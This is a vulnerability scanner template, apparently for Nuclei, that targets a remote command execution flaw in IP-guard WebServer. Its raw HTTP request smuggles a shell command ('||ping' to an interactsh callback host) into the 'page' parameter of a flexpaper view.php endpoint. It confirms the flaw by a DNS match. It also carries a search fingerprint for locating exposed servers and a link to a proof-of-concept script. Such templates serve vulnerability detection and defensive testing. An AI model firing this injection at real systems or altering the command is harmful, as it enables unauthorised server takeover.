http:
    - extractors:
        - kval:
            - interactsh_ip
          type: kval
      matchers:
        - part: interactsh_protocol
          type: word
          words:
            - dns
      matchers-condition: and
      raw:
        - |
          GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||ping%20{{interactsh-url}} HTTP/1.1
          Host: {{Hostname}}
id: ip-guard-webserver-rce
info:
    author: SleepingBag945
    description: |
        IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件，旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。
        IP-guard WebServer远程命令执行漏洞。攻击者可利用该漏洞执行任意命令，获取服务器控制权限。
        "IP-guard" && icon_hash="2030860561"
    name: IP-Guard Webserver 远程命令执行
    reference:
        - https://github.com/MD-SEC/MDPOCS/blob/3578845eae03ccf581c00e9f49ffc8c75162c831/Ip_Guard_Webserver_View_Rce_Poc.py#L48
    severity: critical
    tags:
        - ipguard
        - IP-Guard
        - Xpaper
